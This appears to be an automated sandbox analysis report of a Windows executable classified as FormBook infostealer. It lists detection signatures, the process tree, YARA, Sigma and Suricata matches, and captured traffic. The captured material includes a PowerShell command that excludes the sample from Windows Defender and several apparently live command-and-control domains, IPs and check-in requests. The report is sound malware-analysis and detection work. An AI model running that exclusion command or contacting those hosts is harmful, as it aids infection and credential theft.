Edit tour

Windows Analysis Report
qxXd7JaCvGdKUp8.exe

Overview

General Information

Sample name:	qxXd7JaCvGdKUp8.exe
Analysis ID:	1608106
MD5:	fbeb4ad87e3f2c1f5bad09dd1ccc95a9
SHA1:	820a7108a6fcafdcc3c1a61dc03a813b14423322
SHA256:	5b40169c958b75d6080cc8e7fabcf81ac3d87ea0a3254d6ad2c95c158fa91aa2
Tags:	exeuser-abuse_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

qxXd7JaCvGdKUp8.exe (PID: 2452 cmdline: "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe" MD5: FBEB4AD87E3F2C1F5BAD09DD1CCC95A9)

powershell.exe (PID: 5520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7152 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

qxXd7JaCvGdKUp8.exe (PID: 5268 cmdline: "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe" MD5: FBEB4AD87E3F2C1F5BAD09DD1CCC95A9)

qxXd7JaCvGdKUp8.exe (PID: 576 cmdline: "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe" MD5: FBEB4AD87E3F2C1F5BAD09DD1CCC95A9)

iKfhbNmgVEQKZlbl.exe (PID: 2364 cmdline: "C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\6NAAfx1rnFMp.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

AtBroker.exe (PID: 2656 cmdline: "C:\Windows\SysWOW64\AtBroker.exe" MD5: D5B61959A509BDA85300781F5A829610)

iKfhbNmgVEQKZlbl.exe (PID: 3440 cmdline: "C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\pAvIGo019B6.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 6208 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000A.00000002.3323139781.00000000042E0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.3324905749.00000000050A0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2400453269.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.3322974349.0000000003BB0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2401086517.0000000001160000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2402429418.0000000002030000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3322856806.00000000008A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3321297429.00000000004B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: qxXd7JaCvGdKUp8.exe PID: 2452	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.qxXd7JaCvGdKUp8.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
6.2.qxXd7JaCvGdKUp8.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe", ParentImage: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe, ParentProcessId: 2452, ParentProcessName: qxXd7JaCvGdKUp8.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe", ProcessId: 5520, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe", ParentImage: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe, ParentProcessId: 2452, ParentProcessName: qxXd7JaCvGdKUp8.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe", ProcessId: 5520, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-06T08:53:26.498603+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49883	47.83.1.90	80	TCP
2025-02-06T08:53:49.729786+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49986	199.59.243.160	80	TCP
2025-02-06T08:54:04.667758+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49991	103.117.135.13	80	TCP
2025-02-06T08:54:19.097172+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49995	162.210.199.73	80	TCP
2025-02-06T08:54:32.357347+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49999	13.248.169.48	80	TCP
2025-02-06T08:54:46.233011+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	50003	162.0.231.203	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.82765.ltd/ish5/	Avira URL Cloud: Label: phishing
Source: http://www.besttreasurespot.shop/v36n/	Avira URL Cloud: Label: malware
Source: http://www.82765.ltd/ish5/?GRC0WvYH=0jMUMBUqwV3no3sabybOi0EvFSx1hfHs6ErlLsUWxZGiDhNpPKRVb33sFbeGKfe6pBhH4RuN2mGp4Mwo9gf8WCJuuDYrijVhq9o3PCo1Dw1wI+EzMTIXneGVCkBHtADFXQ==&NH-tO=5pC4cT	Avira URL Cloud: Label: phishing
Source: http://www.besttreasurespot.shop/v36n/?GRC0WvYH=h4Ap/i7DMWbez03CkrkV1n6DkhnjbYTPPmnFTHNtBOnYWWJFEB+gt3t1SdxGc0P9P1KGRPtWKFgvxNBMRlWDVxtmWPsubAx6D+9a1eA+0LHnQqV0YtofVVjDnx3X0ZkdIA==&NH-tO=5pC4cT	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: qxXd7JaCvGdKUp8.exe	ReversingLabs: Detection: 31%
Source: qxXd7JaCvGdKUp8.exe	Virustotal: Detection: 28%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 6.2.qxXd7JaCvGdKUp8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.qxXd7JaCvGdKUp8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3323139781.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3324905749.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2400453269.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3322974349.0000000003BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2401086517.0000000001160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2402429418.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3322856806.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3321297429.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: qxXd7JaCvGdKUp8.exe

Joe Sandbox ML: detected

Source: qxXd7JaCvGdKUp8.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: qxXd7JaCvGdKUp8.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: ATBroker.pdb source: qxXd7JaCvGdKUp8.exe, 00000006.00000002.2400726244.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, iKfhbNmgVEQKZlbl.exe, 00000009.00000003.2345290131.0000000001565000.00000004.00000020.00020000.00000000.sdmp, iKfhbNmgVEQKZlbl.exe, 00000009.00000002.3322149657.0000000001575000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: qxXd7JaCvGdKUp8.exe, 00000006.00000002.2401256169.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 0000000A.00000003.2402876943.000000000439E000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000A.00000002.3323387098.00000000046EE000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 0000000A.00000003.2400797068.00000000041EB000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000A.00000002.3323387098.0000000004550000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: qxXd7JaCvGdKUp8.exe, qxXd7JaCvGdKUp8.exe, 00000006.00000002.2401256169.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, AtBroker.exe, 0000000A.00000003.2402876943.000000000439E000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000A.00000002.3323387098.00000000046EE000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 0000000A.00000003.2400797068.00000000041EB000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000A.00000002.3323387098.0000000004550000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: ATBroker.pdbGCTL source: qxXd7JaCvGdKUp8.exe, 00000006.00000002.2400726244.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, iKfhbNmgVEQKZlbl.exe, 00000009.00000003.2345290131.0000000001565000.00000004.00000020.00020000.00000000.sdmp, iKfhbNmgVEQKZlbl.exe, 00000009.00000002.3322149657.0000000001575000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: iKfhbNmgVEQKZlbl.exe, 00000009.00000002.3321269117.00000000006EF000.00000002.00000001.01000000.0000000C.sdmp, iKfhbNmgVEQKZlbl.exe, 0000000B.00000000.2479430947.00000000006EF000.00000002.00000001.01000000.0000000C.sdmp

Source: C:\Windows\SysWOW64\AtBroker.exe

Code function: 10_2_004CC730 FindFirstFileW,FindNextFileW,FindClose,

10_2_004CC730

Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4x nop then xor eax, eax		10_2_004B9ED0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4x nop then mov ebx, 00000004h		10_2_043E04DF

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49883 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49986 -> 199.59.243.160:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49991 -> 103.117.135.13:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49995 -> 162.210.199.73:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49999 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50003 -> 162.0.231.203:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.used-cars-auto.xyz
Source:	DNS query: www.allenamento.xyz

Source: Joe Sandbox View

IP Address: 13.248.169.48 13.248.169.48

Source: Joe Sandbox View

ASN Name: LEASEWEB-USA-WDCUS LEASEWEB-USA-WDCUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /cjxs/?NH-tO=5pC4cT&GRC0WvYH=OIkzOcZa1D8+tMqyM6XIy1k1NFai9hxQPu5YL2gegdwIw1Rt5XDcmn7ugF4ZtE6Sl5Iwl00rQvnEtAwBMiYKyW0MQaIAXk/sPwZC/hcX7SW9q+WA1vvA8SCAseIw5UZGJg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.vvxcss.infoConnection: closeUser-Agent: Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 Nokia5230/40.0.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.4 3gpp-gba
Source: global traffic	HTTP traffic detected: GET /sbwh/?GRC0WvYH=ujVY3kNwzBRupp+hR67PAOZ6DjknVbXd/20b3xGp50F/h4tCIdwKe0QiDzxHtROGyLyD8Mew+SxRoszJrb+TArk3VSEyL5YVPxYKJYH/k2b6doDyudHLtFD0FShIWYxsCg==&NH-tO=5pC4cT HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.used-cars-auto.xyzConnection: closeUser-Agent: Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 Nokia5230/40.0.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.4 3gpp-gba
Source: global traffic	HTTP traffic detected: GET /ish5/?GRC0WvYH=0jMUMBUqwV3no3sabybOi0EvFSx1hfHs6ErlLsUWxZGiDhNpPKRVb33sFbeGKfe6pBhH4RuN2mGp4Mwo9gf8WCJuuDYrijVhq9o3PCo1Dw1wI+EzMTIXneGVCkBHtADFXQ==&NH-tO=5pC4cT HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.82765.ltdConnection: closeUser-Agent: Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 Nokia5230/40.0.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.4 3gpp-gba
Source: global traffic	HTTP traffic detected: GET /v36n/?GRC0WvYH=h4Ap/i7DMWbez03CkrkV1n6DkhnjbYTPPmnFTHNtBOnYWWJFEB+gt3t1SdxGc0P9P1KGRPtWKFgvxNBMRlWDVxtmWPsubAx6D+9a1eA+0LHnQqV0YtofVVjDnx3X0ZkdIA==&NH-tO=5pC4cT HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.besttreasurespot.shopConnection: closeUser-Agent: Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 Nokia5230/40.0.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.4 3gpp-gba
Source: global traffic	HTTP traffic detected: GET /nqtv/?NH-tO=5pC4cT&GRC0WvYH=3JIVjcJELSurTHrdzlGpwfIGuWrqz8ckPw30Oja2atx34G3drWVc4e80GNvkgNwAUZYyZAHIfqZRQ7omPkVDkg08ITE528CTIGV4PLIWYHhyBsUIfi9kAQcVZ3PnNHFkuQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.allenamento.xyzConnection: closeUser-Agent: Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 Nokia5230/40.0.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.4 3gpp-gba
Source: global traffic	HTTP traffic detected: GET /ov9p/?GRC0WvYH=O5NEE7rih/sVR9zK6M2mwvhcAx3sBflBgBgcmNCcAFCGbpwaj5w0KPhFXiJKmAU3BlXDOxy8cJNdK/qiJZNNCDwXkDk52583jpT5uyi4JLvo2QW/GqnvLkzRraMGa6kS2Q==&NH-tO=5pC4cT HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usHost: www.dynavision.websiteConnection: closeUser-Agent: Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 Nokia5230/40.0.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.4 3gpp-gba

Source: global traffic	DNS traffic detected: DNS query: www.vvxcss.info
Source: global traffic	DNS traffic detected: DNS query: www.used-cars-auto.xyz
Source: global traffic	DNS traffic detected: DNS query: www.82765.ltd
Source: global traffic	DNS traffic detected: DNS query: www.besttreasurespot.shop
Source: global traffic	DNS traffic detected: DNS query: www.allenamento.xyz
Source: global traffic	DNS traffic detected: DNS query: www.dynavision.website

Source: unknown

HTTP traffic detected: POST /sbwh/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usHost: www.used-cars-auto.xyzOrigin: http://www.used-cars-auto.xyzCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 209Referer: http://www.used-cars-auto.xyz/sbwh/User-Agent: Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 Nokia5230/40.0.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.4 3gpp-gbaData Raw: 47 52 43 30 57 76 59 48 3d 6a 68 39 34 30 55 77 57 73 51 63 44 74 34 65 63 4d 73 6a 5a 48 2b 59 6c 4b 51 77 32 56 2f 4c 39 2b 6b 63 4f 37 43 32 42 33 6a 46 32 38 70 52 65 4e 73 67 4e 5a 48 74 31 43 6d 56 4e 68 54 79 49 2f 36 47 59 34 50 47 4a 37 43 68 6d 6c 39 6e 49 35 59 79 70 55 36 77 44 54 78 39 54 49 37 45 64 4b 77 70 36 4a 2b 37 4c 6c 58 33 54 54 76 72 6a 7a 4e 2f 46 6c 6c 47 36 4c 52 56 50 58 38 38 58 59 56 43 77 43 77 41 5a 65 42 52 38 4e 64 56 6e 76 57 46 6b 63 39 70 56 43 6a 6c 43 57 50 33 4b 69 74 37 65 54 6a 6f 4d 59 54 34 58 6a 64 7a 47 2f 7a 44 63 39 61 6b 33 6e 65 55 56 32 53 62 38 4e 47 65 65 2b 67 55 3d Data Ascii: GRC0WvYH=jh940UwWsQcDt4ecMsjZH+YlKQw2V/L9+kcO7C2B3jF28pReNsgNZHt1CmVNhTyI/6GY4PGJ7Chml9nI5YypU6wDTx9TI7EdKwp6J+7LlX3TTvrjzN/FllG6LRVPX88XYVCwCwAZeBR8NdVnvWFkc9pVCjlCWP3Kit7eTjoMYT4XjdzG/zDc9ak3neUV2Sb8NGee+gU=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 06 Feb 2025 07:53:56 GMTContent-Type: text/html; charset=utf-8Vary: Accept-EncodingContent-Encoding: gzipX-Cache: MISS from sg1-cdnb135-013Transfer-Encoding: chunkedConnection: closeData Raw: 39 63 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5d fb 73 1b 45 9e ff f9 ae ea fe 87 3e 91 5b c9 20 8d de b6 ac d8 ae 53 64 d9 16 d8 92 90 95 87 09 59 d7 68 d4 92 06 8f 66 c4 cc c8 b6 02 a9 82 7d 00 5b 45 96 e5 d8 47 b8 63 8f 0b ec 2e d4 52 9b ec 72 77 c0 02 61 ff 99 c8 71 7e ba 7f e1 be 3d 2f f5 bc 64 11 18 6c dd a1 14 58 ea e9 fe 76 f7 a7 bf af fe 76 4f f7 d2 3f ae 56 8b 8d 9d 5a 09 75 d5 9e b0 f2 0f 7f bf 64 fd c5 6c 0b 7e 23 f8 2c f5 b0 ca 22 ae cb ca 0a 56 97 43 17 1b 6b b1 5c c8 7c a6 f2 aa 80 57 b6 87 8a 8a 7b a8 24 cb 92 bc 14 d7 d3 e8 c2 22 db c3 cb 21 59 6a 4a aa 12 42 9c 24 aa 58 04 52 a2 c4 8b 2d 7c 18 15 a5 b6 24 08 d2 41 08 c5 6d 75 ea c5 f6 79 7c d0 97 64 95 2a 78 c0 b7 d4 ee 72 0b ef f3 1c 8e 69 3f a2 88 17 79 95 67 85 98 c2 b1 02 5e 4e 46 d1 40 c1 b2 f6 8b 6d 42 82 28 59 6d 56 d4 21 b4 59 6f 1f e9 60 fc 71 74 81 55 30 7a 3c 3e 4e 6b 4a ad 21 7a 61 fc 9b e4 e3 24 41 92 f3 e8 b1 74 3a 7d de fe a4 0d 3d ca a3 64 a6 7f 88 2e 61 b9 c5 8a 6c 14 85 36 b0 b0 8f 55 9e 63 51 05 0f 70 28 8a ba 66 42 14 15 64 68 6a 14 85 b7 78 4e 96 14 a9 ad a2 1d 76 03 f3 e1 28 52 58 51 89 41 cb f9 b6 a3 8e 1e 2b 77 78 31 8f 12 8e f4 3e db 6a f1 62 07 1e a0 54 02 1a 40 fe e7 c8 72 20 c9 ad 58 53 c6 ec 5e 1e 69 7f 62 24 85 ca 74 63 dc 9d 6e d2 d1 6b b3 de 24 21 9e 70 55 4f ba 1e 53 f8 eb 38 8f 52 39 57 cd da d3 03 cc 77 ba 80 4f 36 e1 6c bb c0 8b 38 d6 35 1e a7 53 b6 e2 74 9b 52 3e 23 91 49 e5 72 1c f6 18 0c ab ce 8c ab 4e 0b af 79 d2 1f 1f 90 b5 67 ae a7 54 5f 93 ee be 36 01 53 e0 38 e0 71 55 ea 01 37 00 09 45 12 f8 16 7a 0c 63 ba 8d 74 c7 d2 8c 32 68 76 41 d6 60 04 fd d8 cd b3 93 e6 a8 4c 68 a8 09 bb 1d 02 5b ed 7e 43 6d 1f 09 c2 fb 74 d7 a1 ce 49 90 37 25 c1 87 b7 d8 66 53 76 8e e4 40 56 88 50 81 6c f4 1d 44 55 7c a8 c6 5a 98 93 64 56 e5 25 e0 fc 01 28 0b 99 b0 cc e4 8c 31 4d be f3 a8 05 03 81 fd 5a e2 6c 86 21 da b9 79 f2 cf 41 9f 33 da d8 07 75 a5 62 99 7a 4a 81 c9 e6 bb d2 3e 76 76 6f aa 3e 50 54 18 4d 22 30 d1 a3 8e 16 36 59 6e af 23 4b 80 01 68 a0 76 8e 6b 72 4d 7b 43 c6 22 cc 60 ae 2b 21 95 a8 3d 27 4f 69 ba 12 78 33 91 f8 a7 c9 a5 fb b2 ab ac 25 38 49 37 03 90 ae b7 41 83 e7 11 3b 50 25 07 7e 14 ef e4 b2 74 bd 84 b1 6c 2a 20 c9 64 b2 8e c2 e3 7e c7 4c fd db 5e 20 ff 9c f9 34 e9 73 ab 47 43 2a 65 10 b1 81 92 47 69 6f de 6d b3 3d 5e 18 e6 51 51 12 41 66 59 05 d4 f7 26 df c4 3a e7 a1 2d 09 ac 47 14 6d 61 51 90 a2 90 67 20 f3 58 8e a2 1e 24 2b 7d d6 a6 80 60 2c 9d 03 41 a0 5c 41 93 00 f5 d3 42 74 3a c5 24 60 af 36 d9 a1 34 50 6d 16 8b 01 78 62 bd 56 2c ed 33 e6 29 1b f4 34 cf 19 05 17 7d 0a 2e f8 15 bc ca 01 52 ca 0f 97 43 06 81 d0 35 27 05 60 09 16 14 bf 80 db aa b7 d4 30 9c 80 59 b9 cd 1f 3a 4b 6a e9 79 d0 a5 5d ef 82 ff dc c3 2d 9e 45 92 28 0c 91 c2 c9 18 8b 68 8c 3b 2b b6 50 a4 c7 8b a0 3d c6 1e 02
